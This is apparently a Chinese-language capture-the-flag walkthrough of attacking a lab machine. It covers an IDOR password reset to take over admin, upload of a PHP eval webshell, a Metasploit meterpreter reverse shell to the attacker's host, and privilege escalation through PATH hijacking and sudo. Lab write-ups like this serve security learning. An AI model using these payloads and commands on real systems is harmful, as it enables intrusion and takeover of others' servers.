信息收集
nmap扫描
访问80端口 
点击注册,尝试用admin作为用户名注册,发现已占用 
注册hsy账户,密码123,登录进去发现可以修改密码,而且id=2,可以猜测admin账户为id=1
改密码bp抓包,把id=2,该成id=1,放包
登录admin,发现密码修改成功,然后还发现了上传文件的地方,可能存在文件上传漏洞
传一句话木马试一试,发现后缀为phtml文件可以上传
<?php @eval($_POST['cmd']);?>上传后访问 url上传的目录
中国蚁剑连接,点击添加数据
getshell
进入john家目录,执行toto,提权,发现可以执行id命令
直接反弹shell到kali里面,使用蚁剑后面会出现bug,
生成msfshell.php,赋权,开启http服务
菜刀 里面下载msfshell.pfp
kali部署msfconsole
use exploit/multi/handler
set lhost 本机ip
set lport 7777
set payload php/meterpreter/reverse_tcp
url访问10.4.7.135/upload/msfshell.php
kali里面反弹成功,登录shell
输入交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
既然可以执行id命令,修改环境变量
echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto
再次执行toto,发现变成john用户 
打开joho目录下password发现密码root123
sudo -l 查看可以执行哪些管理员命令
将python交互式shell输入到file.py执行
提权成功
扫一扫
296
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
